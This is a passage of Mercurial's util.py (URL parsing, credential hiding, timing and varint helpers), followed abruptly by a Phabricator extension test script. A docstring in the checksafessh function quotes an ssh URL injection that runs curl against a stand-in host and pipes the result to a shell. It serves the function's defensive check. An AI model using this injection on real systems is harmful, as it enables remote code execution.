    in addition to I/O that is performed by this instance. If there is,
    state tracking will get out of sync and unexpected results will ensue.
    """

    def __init__(self, fh, limit):
        """Allow reading up to <limit> bytes from <fh>."""
        self._fh = fh
        self._left = limit

    def read(self, n=-1):
        if not self._left:
            return b''

        if n < 0:
            n = self._left

        data = self._fh.read(min(n, self._left))
        self._left -= len(data)
        assert self._left >= 0

        return data

    def readinto(self, b):
        res = self.read(len(b))
        if res is None:
            return None

        b[0 : len(res)] = res
        return len(res)


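# Hedged sketch (hypothetical caller): expose only the next 16 bytes of a
# stream as if they were the whole file, e.g. for a length-prefixed frame.
def _democappedreader(fh):
    capped = cappedreader(fh, 16)
    head = capped.read()  # at most 16 bytes
    assert capped.read() == b''  # past the cap reads as EOF
    return head

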
def unitcountfn(*unittable):
    '''return a function that renders a readable count of some quantity'''

    def go(count):
        for multiplier, divisor, format in unittable:
            if abs(count) >= divisor * multiplier:
                return format % (count / float(divisor))
        return unittable[-1][2] % count

    return go


def processlinerange(fromline, toline):
    """Check that linerange <fromline>:<toline> makes sense and return a
    0-based range.

    >>> processlinerange(10, 20)
    (9, 20)
    >>> processlinerange(2, 1)
    Traceback (most recent call last):
    ...
    ParseError: line range must be positive
    >>> processlinerange(0, 5)
    Traceback (most recent call last):
    ...
    ParseError: fromline must be strictly positive
    """
    if toline - fromline < 0:
        raise error.ParseError(_(b"line range must be positive"))
    if fromline < 1:
        raise error.ParseError(_(b"fromline must be strictly positive"))
    return fromline - 1, toline


bytecount = unitcountfn(
    (100, 1 << 30, _(b'%.0f GB')),
    (10, 1 << 30, _(b'%.1f GB')),
    (1, 1 << 30, _(b'%.2f GB')),
    (100, 1 << 20, _(b'%.0f MB')),
    (10, 1 << 20, _(b'%.1f MB')),
    (1, 1 << 20, _(b'%.2f MB')),
    (100, 1 << 10, _(b'%.0f KB')),
    (10, 1 << 10, _(b'%.1f KB')),
    (1, 1 << 10, _(b'%.2f KB')),
    (1, 1, _(b'%.0f bytes')),
)


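# Illustration of the table above (values computed by hand, so hedged):
# each row is (multiplier, divisor, format); the first row whose
# threshold the count reaches wins.
def _demobytecount():
    # -> (b'0 bytes', b'2.00 KB', b'10.0 MB')
    return bytecount(0), bytecount(2048), bytecount(10 << 20)

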
class transformingwriter(object):
    """Writable file wrapper to transform data by function"""

    def __init__(self, fp, encode):
        self._fp = fp
        self._encode = encode

    def close(self):
        self._fp.close()

    def flush(self):
        self._fp.flush()

    def write(self, data):
        return self._fp.write(self._encode(data))


# Matches a single EOL which can either be a CRLF where repeated CR
# are removed or a LF. We do not care about old Macintosh files, so a
# stray CR is an error.
_eolre = remod.compile(br'\r*\n')


def tolf(s):
    return _eolre.sub(b'\n', s)


def tocrlf(s):
    return _eolre.sub(b'\r\n', s)


def _crlfwriter(fp):
    return transformingwriter(fp, tocrlf)


if pycompat.oslinesep == b'\r\n':
    tonativeeol = tocrlf
    fromnativeeol = tolf
    nativeeolwriter = _crlfwriter
else:
    tonativeeol = pycompat.identity
    fromnativeeol = pycompat.identity
    nativeeolwriter = pycompat.identity

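
# Quick sketch of the helpers above (values computed from the regex, so
# treat as illustrative): runs of CRs before a LF collapse to one EOL.
def _demoeol():
    text = b'one\r\ntwo\n'
    assert tolf(text) == b'one\ntwo\n'
    assert tocrlf(text) == b'one\r\ntwo\r\n'
    return tonativeeol(text)  # picks one of the two per platform
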
if pyplatform.python_implementation() == b'CPython' and sys.version_info < (
    3,
    0,
):
    # There is an issue in CPython that some IO methods do not handle EINTR
    # correctly. The following table shows what CPython version (and functions)
    # are affected (buggy: has the EINTR bug, okay: otherwise):
    #
    #             | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
    # --------------------------------------------------
    # fp.__iter__ |  buggy  |      buggy      |  okay
    # fp.read*    |  buggy  |     okay [1]    |  okay
    #
    # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
    #
    # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
    # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
    #
    # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
    # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
    # CPython 2, because CPython 2 maintains an internal readahead buffer for
    # fp.__iter__ but not other fp.read* methods.
    #
    # On modern systems like Linux, the "read" syscall cannot be interrupted
    # when reading "fast" files like on-disk files. So the EINTR issue only
    # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
    # files approximately as "fast" files and use the fast (unsafe) code path,
    # to minimize the performance impact.
    if sys.version_info >= (2, 7, 4):
        # fp.readline deals with EINTR correctly, use it as a workaround.
        def _safeiterfile(fp):
            return iter(fp.readline, b'')

    else:
        # fp.read* are broken too, manually deal with EINTR in a stupid way.
        # note: this may block longer than necessary because of bufsize.
        def _safeiterfile(fp, bufsize=4096):
            fd = fp.fileno()
            line = b''
            while True:
                try:
                    buf = os.read(fd, bufsize)
                except OSError as ex:
                    # os.read only raises EINTR before any data is read
                    if ex.errno == errno.EINTR:
                        continue
                    else:
                        raise
                line += buf
                if b'\n' in buf:
                    splitted = line.splitlines(True)
                    line = b''
                    for l in splitted:
                        if l[-1] == b'\n':
                            yield l
                        else:
                            line = l
                if not buf:
                    break
            if line:
                yield line

    def iterfile(fp):
        fastpath = True
        if type(fp) is file:
            fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
        if fastpath:
            return fp
        else:
            return _safeiterfile(fp)


else:
    # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
    def iterfile(fp):
        return fp


def iterlines(iterator):
    for chunk in iterator:
        for line in chunk.splitlines():
            yield line


def expandpath(path):
    return os.path.expanduser(os.path.expandvars(path))


def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
    """Return the result of interpolating items in the mapping into string s.

    prefix is a single character string, or a two character string with
    a backslash as the first character if the prefix needs to be escaped in
    a regular expression.

    fn is an optional function that will be applied to the replacement text
    just before replacement.

    escape_prefix is an optional flag that allows a doubled prefix to be
    used as an escape for the prefix itself.
    """
    fn = fn or (lambda s: s)
    patterns = b'|'.join(mapping.keys())
    if escape_prefix:
        patterns += b'|' + prefix
        if len(prefix) > 1:
            prefix_char = prefix[1:]
        else:
            prefix_char = prefix
        mapping[prefix_char] = prefix_char
    r = remod.compile(br'%s(%s)' % (prefix, patterns))
    return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)


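# Worked example (made-up mapping) of the expansion described above:
# b'%user' and b'%repo' are looked up in the mapping and substituted.
def _demointerpolate():
    mapping = {b'user': b'alice', b'repo': b'hg'}
    # -> b'alice pushed to hg'
    return interpolate(b'%', mapping, b'%user pushed to %repo')

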
def getport(port):
    """Return the port for a given network service.

    If port is an integer, it's returned as is. If it's a string, it's
    looked up using socket.getservbyname(). If there's no matching
    service, error.Abort is raised.
    """
    try:
        return int(port)
    except ValueError:
        pass

    try:
        return socket.getservbyname(pycompat.sysstr(port))
    except socket.error:
        raise error.Abort(
            _(b"no port number associated with service '%s'") % port
        )


class url(object):
    r"""Reliable URL parser.

    This parses URLs and provides attributes for the following
    components:

    <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>

    Missing components are set to None. The only exception is
    fragment, which is set to '' if present but empty.

    If parsefragment is False, fragment is included in query. If
    parsequery is False, query is included in path. If both are
    False, both fragment and query are included in path.

    See http://www.ietf.org/rfc/rfc2396.txt for more information.

    Note that for backward compatibility reasons, bundle URLs do not
    take host names. That means 'bundle://../' has a path of '../'.

    Examples:

    >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
    <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
    >>> url(b'ssh://[::1]:2200//home/joe/repo')
    <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
    >>> url(b'file:///home/joe/repo')
    <url scheme: 'file', path: '/home/joe/repo'>
    >>> url(b'file:///c:/temp/foo/')
    <url scheme: 'file', path: 'c:/temp/foo/'>
    >>> url(b'bundle:foo')
    <url scheme: 'bundle', path: 'foo'>
    >>> url(b'bundle://../foo')
    <url scheme: 'bundle', path: '../foo'>
    >>> url(br'c:\foo\bar')
    <url path: 'c:\\foo\\bar'>
    >>> url(br'\\blah\blah\blah')
    <url path: '\\\\blah\\blah\\blah'>
    >>> url(br'\\blah\blah\blah#baz')
    <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
    >>> url(br'file:///C:\users\me')
    <url scheme: 'file', path: 'C:\\users\\me'>

    Authentication credentials:

    >>> url(b'ssh://joe:xyz@x/repo')
    <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
    >>> url(b'ssh://joe@x/repo')
    <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>

    Query strings and fragments:

    >>> url(b'http://host/a?b#c')
    <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
    >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
    <url scheme: 'http', host: 'host', path: 'a?b#c'>

    Empty path:

    >>> url(b'')
    <url path: ''>
    >>> url(b'#a')
    <url path: '', fragment: 'a'>
    >>> url(b'http://host/')
    <url scheme: 'http', host: 'host', path: ''>
    >>> url(b'http://host/#a')
    <url scheme: 'http', host: 'host', path: '', fragment: 'a'>

    Only scheme:

    >>> url(b'http:')
    <url scheme: 'http'>
    """

    _safechars = b"!~*'()+"
    _safepchars = b"/!~*'()+:\\"
    _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match

    def __init__(self, path, parsequery=True, parsefragment=True):
        # We slowly chomp away at path until we have only the path left
        self.scheme = self.user = self.passwd = self.host = None
        self.port = self.path = self.query = self.fragment = None
        self._localpath = True
        self._hostport = b''
        self._origpath = path

        if parsefragment and b'#' in path:
            path, self.fragment = path.split(b'#', 1)

        # special case for Windows drive letters and UNC paths
        if hasdriveletter(path) or path.startswith(b'\\\\'):
            self.path = path
            return

        # For compatibility reasons, we can't handle bundle paths as
        # normal URLs
        if path.startswith(b'bundle:'):
            self.scheme = b'bundle'
            path = path[7:]
            if path.startswith(b'//'):
                path = path[2:]
            self.path = path
            return

        if self._matchscheme(path):
            parts = path.split(b':', 1)
            if parts[0]:
                self.scheme, path = parts
                self._localpath = False

        if not path:
            path = None
            if self._localpath:
                self.path = b''
                return
        else:
            if self._localpath:
                self.path = path
                return

            if parsequery and b'?' in path:
                path, self.query = path.split(b'?', 1)
                if not path:
                    path = None
                if not self.query:
                    self.query = None

            # // is required to specify a host/authority
            if path and path.startswith(b'//'):
                parts = path[2:].split(b'/', 1)
                if len(parts) > 1:
                    self.host, path = parts
                else:
                    self.host = parts[0]
                    path = None
                if not self.host:
                    self.host = None
                    # path of file:///d is /d
                    # path of file:///d:/ is d:/, not /d:/
                    if path and not hasdriveletter(path):
                        path = b'/' + path

            if self.host and b'@' in self.host:
                self.user, self.host = self.host.rsplit(b'@', 1)
                if b':' in self.user:
                    self.user, self.passwd = self.user.split(b':', 1)
                if not self.host:
                    self.host = None

            # Don't split on colons in IPv6 addresses without ports
            if (
                self.host
                and b':' in self.host
                and not (
                    self.host.startswith(b'[') and self.host.endswith(b']')
                )
            ):
                self._hostport = self.host
                self.host, self.port = self.host.rsplit(b':', 1)
                if not self.host:
                    self.host = None

            if (
                self.host
                and self.scheme == b'file'
                and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
            ):
                raise error.Abort(
                    _(b'file:// URLs can only refer to localhost')
                )

        self.path = path

        # leave the query string escaped
        for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
            v = getattr(self, a)
            if v is not None:
                setattr(self, a, urlreq.unquote(v))

    @encoding.strmethod
    def __repr__(self):
        attrs = []
        for a in (
            b'scheme',
            b'user',
            b'passwd',
            b'host',
            b'port',
            b'path',
            b'query',
            b'fragment',
        ):
            v = getattr(self, a)
            if v is not None:
                attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
        return b'<url %s>' % b', '.join(attrs)

    def __bytes__(self):
        r"""Join the URL's components back into a URL string.

        Examples:

        >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
        'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
        'http://user:pw@host:80/?foo=bar&baz=42'
        >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
        'http://user:pw@host:80/?foo=bar%3dbaz'
        >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
        'ssh://user:pw@[::1]:2200//home/joe#'
        >>> bytes(url(b'http://localhost:80//'))
        'http://localhost:80//'
        >>> bytes(url(b'http://localhost:80/'))
        'http://localhost:80/'
        >>> bytes(url(b'http://localhost:80'))
        'http://localhost:80/'
        >>> bytes(url(b'bundle:foo'))
        'bundle:foo'
        >>> bytes(url(b'bundle://../foo'))
        'bundle:../foo'
        >>> bytes(url(b'path'))
        'path'
        >>> bytes(url(b'file:///tmp/foo/bar'))
        'file:///tmp/foo/bar'
        >>> bytes(url(b'file:///c:/tmp/foo/bar'))
        'file:///c:/tmp/foo/bar'
        >>> print(url(br'bundle:foo\bar'))
        bundle:foo\bar
        >>> print(url(br'file:///D:\data\hg'))
        file:///D:\data\hg
        """
        if self._localpath:
            s = self.path
            if self.scheme == b'bundle':
                s = b'bundle:' + s
            if self.fragment:
                s += b'#' + self.fragment
            return s

        s = self.scheme + b':'
        if self.user or self.passwd or self.host:
            s += b'//'
        elif self.scheme and (
            not self.path
            or self.path.startswith(b'/')
            or hasdriveletter(self.path)
        ):
            s += b'//'
            if hasdriveletter(self.path):
                s += b'/'
        if self.user:
            s += urlreq.quote(self.user, safe=self._safechars)
        if self.passwd:
            s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
        if self.user or self.passwd:
            s += b'@'
        if self.host:
            if not (self.host.startswith(b'[') and self.host.endswith(b']')):
                s += urlreq.quote(self.host)
            else:
                s += self.host
        if self.port:
            s += b':' + urlreq.quote(self.port)
        if self.host:
            s += b'/'
        if self.path:
            # TODO: similar to the query string, we should not unescape the
            # path when we store it, the path might contain '%2f' = '/',
            # which we should *not* escape.
            s += urlreq.quote(self.path, safe=self._safepchars)
        if self.query:
            # we store the query in escaped form.
            s += b'?' + self.query
        if self.fragment is not None:
            s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
        return s

    __str__ = encoding.strmethod(__bytes__)

    def authinfo(self):
        user, passwd = self.user, self.passwd
        try:
            self.user, self.passwd = None, None
            s = bytes(self)
        finally:
            self.user, self.passwd = user, passwd
        if not self.user:
            return (s, None)
        # authinfo[1] is passed to urllib2 password manager, and its
        # URIs must not contain credentials. The host is passed in the
        # URIs list because Python < 2.4.3 uses only that to search for
        # a password.
        return (s, (None, (s, self.host), self.user, self.passwd or b''))

    def isabs(self):
        if self.scheme and self.scheme != b'file':
            return True  # remote URL
        if hasdriveletter(self.path):
            return True  # absolute for our purposes - can't be joined()
        if self.path.startswith(br'\\'):
            return True  # Windows UNC path
        if self.path.startswith(b'/'):
            return True  # POSIX-style
        return False

    def localpath(self):
        if self.scheme == b'file' or self.scheme == b'bundle':
            path = self.path or b'/'
            # For Windows, we need to promote hosts containing drive
            # letters to paths with drive letters.
            if hasdriveletter(self._hostport):
                path = self._hostport + b'/' + self.path
            elif (
                self.host is not None and self.path and not hasdriveletter(path)
            ):
                path = b'/' + path
            return path
        return self._origpath

    def islocal(self):
        '''whether localpath will return something that posixfile can open'''
        return (
            not self.scheme
            or self.scheme == b'file'
            or self.scheme == b'bundle'
        )

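# Illustrative sketch (not part of util.py): parsing splits a URL into
# attributes, and bytes() reassembles them. Assuming the class above:
#
#   u = url(b'ssh://alice@example.com:2200/repo?rev=tip')
#   u.scheme, u.user, u.host, u.port  -> b'ssh', b'alice', b'example.com', b'2200'
#   u.path, u.query                   -> b'repo', b'rev=tip'
#   bytes(u)                          -> b'ssh://alice@example.com:2200/repo?rev=tip'
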
def hasscheme(path):
    return bool(url(path).scheme)


def hasdriveletter(path):
    return path and path[1:2] == b':' and path[0:1].isalpha()


def urllocalpath(path):
    return url(path, parsequery=False, parsefragment=False).localpath()


def checksafessh(path):
    """check if a path / url is a potentially unsafe ssh exploit (SEC)

    This is a sanity check for ssh urls. ssh will parse the first item as
    an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
    Let's prevent these potentially exploitable urls entirely and warn the
    user.

    Raises an error.Abort when the url is unsafe.
    """
    path = urlreq.unquote(path)
    if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
        raise error.Abort(
            _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
        )

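# Illustrative sketch (not part of util.py): a host beginning with '-'
# would be parsed by ssh as a command-line option, hence the check above.
#
#   checksafessh(b'ssh://user@host/repo')      # returns None, url is fine
#   checksafessh(b'ssh://-oProxyCommand=x/y')  # raises error.Abort
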
def hidepassword(u):
    '''hide user credential in a url string'''
    u = url(u)
    if u.passwd:
        u.passwd = b'***'
    return bytes(u)


def removeauth(u):
    '''remove all authentication information from a url string'''
    u = url(u)
    u.user = u.passwd = None
    return bytes(u)

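# Illustrative sketch (not part of util.py): both helpers round-trip the
# string through the url class, so everything but the credentials survives.
#
#   hidepassword(b'https://alice:s3cret@example.com/repo')
#       -> b'https://alice:***@example.com/repo'
#   removeauth(b'https://alice:s3cret@example.com/repo')
#       -> b'https://example.com/repo'
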
timecount = unitcountfn(
    (1, 1e3, _(b'%.0f s')),
    (100, 1, _(b'%.1f s')),
    (10, 1, _(b'%.2f s')),
    (1, 1, _(b'%.3f s')),
    (100, 0.001, _(b'%.1f ms')),
    (10, 0.001, _(b'%.2f ms')),
    (1, 0.001, _(b'%.3f ms')),
    (100, 0.000001, _(b'%.1f us')),
    (10, 0.000001, _(b'%.2f us')),
    (1, 0.000001, _(b'%.3f us')),
    (100, 0.000000001, _(b'%.1f ns')),
    (10, 0.000000001, _(b'%.2f ns')),
    (1, 0.000000001, _(b'%.3f ns')),
)


@attr.s
class timedcmstats(object):
    """Stats information produced by the timedcm context manager on entering."""

    # the starting value of the timer as a float (meaning and resolution are
    # platform dependent, see util.timer)
    start = attr.ib(default=attr.Factory(lambda: timer()))
    # the number of seconds as a floating point value; starts at 0, updated when
    # the context is exited.
    elapsed = attr.ib(default=0)
    # the number of nested timedcm context managers.
    level = attr.ib(default=1)

    def __bytes__(self):
        return timecount(self.elapsed) if self.elapsed else b'<unknown>'

    __str__ = encoding.strmethod(__bytes__)


@contextlib.contextmanager
def timedcm(whencefmt, *whenceargs):
    """A context manager that produces timing information for a given context.

    On entering, a timedcmstats instance is produced.

    This context manager is reentrant.

    """
    # track nested context managers
    timedcm._nested += 1
    timing_stats = timedcmstats(level=timedcm._nested)
    try:
        with tracing.log(whencefmt, *whenceargs):
            yield timing_stats
    finally:
        timing_stats.elapsed = timer() - timing_stats.start
        timedcm._nested -= 1


timedcm._nested = 0

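# Illustrative usage (not part of util.py): the stats object yielded on
# entry is updated in place when the block exits, so it can be read after.
#
#   with timedcm(b'loading %s', b'manifest') as stats:
#       do_expensive_work()          # hypothetical workload
#   print(bytes(stats))              # e.g. b'1.23 ms', via timecount()
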
def timed(func):
    '''Report the execution time of a function call to stderr.

    During development, use as a decorator when you need to measure
    the cost of a function, e.g. as follows:

    @util.timed
    def foo(a, b, c):
        pass
    '''

    def wrapper(*args, **kwargs):
        with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
            result = func(*args, **kwargs)
        stderr = procutil.stderr
        stderr.write(
            b'%s%s: %s\n'
            % (
                b' ' * time_stats.level * 2,
                pycompat.bytestr(func.__name__),
                time_stats,
            )
        )
        return result

    return wrapper


_sizeunits = (
    (b'm', 2 ** 20),
    (b'k', 2 ** 10),
    (b'g', 2 ** 30),
    (b'kb', 2 ** 10),
    (b'mb', 2 ** 20),
    (b'gb', 2 ** 30),
    (b'b', 1),
)


def sizetoint(s):
    '''Convert a space specifier to a byte count.

    >>> sizetoint(b'30')
    30
    >>> sizetoint(b'2.2kb')
    2252
    >>> sizetoint(b'6M')
    6291456
    '''
    t = s.strip().lower()
    try:
        for k, u in _sizeunits:
            if t.endswith(k):
                return int(float(t[: -len(k)]) * u)
        return int(t)
    except ValueError:
        raise error.ParseError(_(b"couldn't parse size: %s") % s)


class hooks(object):
    '''A collection of hook functions that can be used to extend a
    function's behavior. Hooks are called in lexicographic order,
    based on the names of their sources.'''

    def __init__(self):
        self._hooks = []

    def add(self, source, hook):
        self._hooks.append((source, hook))

    def __call__(self, *args):
        self._hooks.sort(key=lambda x: x[0])
        results = []
        for source, hook in self._hooks:
            results.append(hook(*args))
        return results

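# Illustrative usage (not part of util.py): hooks run sorted by source
# name, and __call__ collects every hook's return value.
#
#   h = hooks()
#   h.add(b'zz-late', lambda v: v + 1)
#   h.add(b'aa-early', lambda v: v * 2)
#   h(3)   -> [6, 4], since 'aa-early' sorts before 'zz-late'
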
def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
    '''Yields lines for a nicely formatted stacktrace.
    Skips the 'skip' last entries, then returns the last 'depth' entries.
    Each file+linenumber is formatted according to fileline.
    Each line is formatted according to line.
    If line is None, it yields:
        length of longest filepath+line number,
        filepath+linenumber,
        function

    Not to be used in production code but very convenient while developing.
    '''
    entries = [
        (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
        for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
    ][-depth:]
    if entries:
        fnmax = max(len(entry[0]) for entry in entries)
        for fnln, func in entries:
            if line is None:
                yield (fnmax, fnln, func)
            else:
                yield line % (fnmax, fnln, func)


def debugstacktrace(
    msg=b'stacktrace',
    skip=0,
    f=procutil.stderr,
    otherf=procutil.stdout,
    depth=0,
    prefix=b'',
):
    '''Writes a message to f (stderr) with a nicely formatted stacktrace.
    Skips the 'skip' entries closest to the call, then shows 'depth' entries.
    By default it will flush stdout first.
    It can be used everywhere and intentionally does not require an ui object.
    Not to be used in production code but very convenient while developing.
    '''
    if otherf:
        otherf.flush()
    f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
    for line in getstackframes(skip + 1, depth=depth):
        f.write(prefix + line)
    f.flush()


# convenient shortcut
dst = debugstacktrace


def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = b'%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = b'%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

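# Illustrative usage (not part of util.py): the first candidate is
# 'f~tag'; numeric suffixes are only tried on collision. Assumes neither
# name already exists in ctx.
#
#   safename(b'f', b'orig', ctx)                      -> b'f~orig'
#   safename(b'f', b'orig', ctx, others={b'f~orig'})  -> b'f~orig~1'
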
def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(
            _(b"stream ended unexpectedly (got %d bytes, expected %d)")
            % (len(s), n)
        )
    return s


def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
    bits = value & 0x7F
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7F
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return b''.join(bytes)


def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= (byte & 0x7F) << shift
        if not (byte & 0x80):
            return result
        shift += 7
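# Illustrative round trip (not part of util.py): any value encoded with
# uvarintencode decodes back to itself.
#
#   from io import BytesIO
#   for n in (0, 1, 127, 1337, 65536):
#       assert uvarintdecodestream(BytesIO(uvarintencode(n))) == n
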
@@ -1,311 +1,326 @@
#require vcr
  $ cat >> $HGRCPATH <<EOF
  > [extensions]
  > phabricator =
  > EOF
  $ hg init repo
  $ cd repo
  $ cat >> .hg/hgrc <<EOF
  > [phabricator]
  > url = https://phab.mercurial-scm.org/
  > callsign = HG
  >
  > [auth]
  > hgphab.schemes = https
  > hgphab.prefix = phab.mercurial-scm.org
  > # When working on the extension and making phabricator interaction
  > # changes, edit this to be a real phabricator token. When done, edit
  > # it back. The VCR transcripts will be auto-sanitised to replace your real
  > # token with this value.
  > hgphab.phabtoken = cli-hahayouwish
  > EOF
  $ VCR="$TESTDIR/phabricator"

Error is handled reasonably. We override the phabtoken here so that
when you're developing changes to phabricator.py you can edit the
above config and have a real token in the test but not have to edit
this test.
  $ hg phabread --config auth.hgphab.phabtoken=cli-notavalidtoken \
  >  --test-vcr "$VCR/phabread-conduit-error.json" D4480 | head
  abort: Conduit Error (ERR-INVALID-AUTH): API token "cli-notavalidtoken" has the wrong length. API tokens should be 32 characters long.

Missing arguments print the command help

  $ hg phabread
  hg phabread: invalid arguments
  hg phabread DREVSPEC [OPTIONS]

  print patches from Phabricator suitable for importing

  options:

   --stack read dependencies

  (use 'hg phabread -h' to show more help)
  [255]

Basic phabread:
  $ hg phabread --test-vcr "$VCR/phabread-4480.json" D4480 | head
  # HG changeset patch
  # Date 1536771503 0
  # Parent a5de21c9e3703f8e8eb064bd7d893ff2f703c66a
  exchangev2: start to implement pull with wire protocol v2

  Wire protocol version 2 will take a substantially different
  approach to exchange than version 1 (at least as far as pulling
  is concerned).

  This commit establishes a new exchangev2 module for holding

phabupdate with an accept:
  $ hg phabupdate --accept D4564 \
  > -m 'I think I like where this is headed. Will read rest of series later.'\
  >  --test-vcr "$VCR/accept-4564.json"
  abort: Conduit Error (ERR-CONDUIT-CORE): Validation errors:
  - You can not accept this revision because it has already been closed. Only open revisions can be accepted.
  [255]
  $ hg phabupdate --accept D7913 -m 'LGTM' --test-vcr "$VCR/accept-7913.json"

Create a differential diff:
  $ HGENCODING=utf-8; export HGENCODING
  $ echo alpha > alpha
  $ hg ci --addremove -m 'create alpha for phabricator test €'
  adding alpha
  $ hg phabsend -r . --test-vcr "$VCR/phabsend-create-alpha.json"
  D7915 - created - d386117f30e6: create alpha for phabricator test \xe2\x82\xac (esc)
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/d386117f30e6-24ffe649-phabsend.hg
  $ echo more >> alpha
  $ HGEDITOR=true hg ci --amend
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/347bf67801e5-3bf313e4-amend.hg
  $ echo beta > beta
  $ hg ci --addremove -m 'create beta for phabricator test'
  adding beta
  $ hg phabsend -r ".^::" --test-vcr "$VCR/phabsend-update-alpha-create-beta.json"
  D7915 - updated - c44b38f24a45: create alpha for phabricator test \xe2\x82\xac (esc)
  D7916 - created - 9e6901f21d5b: create beta for phabricator test
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/9e6901f21d5b-1fcd4f0e-phabsend.hg
  $ unset HGENCODING

The amend won't explode after posting a public commit. The local tag is left
behind to identify it.

  $ echo 'public change' > beta
  $ hg ci -m 'create public change for phabricator testing'
  $ hg phase --public .
  $ echo 'draft change' > alpha
  $ hg ci -m 'create draft change for phabricator testing'
  $ hg phabsend --amend -r '.^::' --test-vcr "$VCR/phabsend-create-public.json"
  D7917 - created - 7b4185ab5d16: create public change for phabricator testing
  D7918 - created - 251c1c333fc6: create draft change for phabricator testing
  warning: not updating public commit 2:7b4185ab5d16
  saved backup bundle to $TESTTMP/repo/.hg/strip-backup/251c1c333fc6-41cb7c3b-phabsend.hg
  $ hg tags -v
  tip 3:3244dc4a3334
  D7917 2:7b4185ab5d16 local

  $ hg debugcallconduit user.search --test-vcr "$VCR/phab-conduit.json" <<EOF
  > {
  >     "constraints": {
  >         "isBot": true
  >     }
  > }
  > EOF
  {
    "cursor": {
      "after": null,
      "before": null,
      "limit": 100,
      "order": null
    },
    "data": [],
    "maps": {},
    "query": {
      "queryKey": null
    }
  }

Template keywords
  $ hg log -T'{rev} {phabreview|json}\n'
  3 {"id": "D7918", "url": "https://phab.mercurial-scm.org/D7918"}
  2 {"id": "D7917", "url": "https://phab.mercurial-scm.org/D7917"}
  1 {"id": "D7916", "url": "https://phab.mercurial-scm.org/D7916"}
  0 {"id": "D7915", "url": "https://phab.mercurial-scm.org/D7915"}

  $ hg log -T'{rev} {if(phabreview, "{phabreview.url} {phabreview.id}")}\n'
  3 https://phab.mercurial-scm.org/D7918 D7918
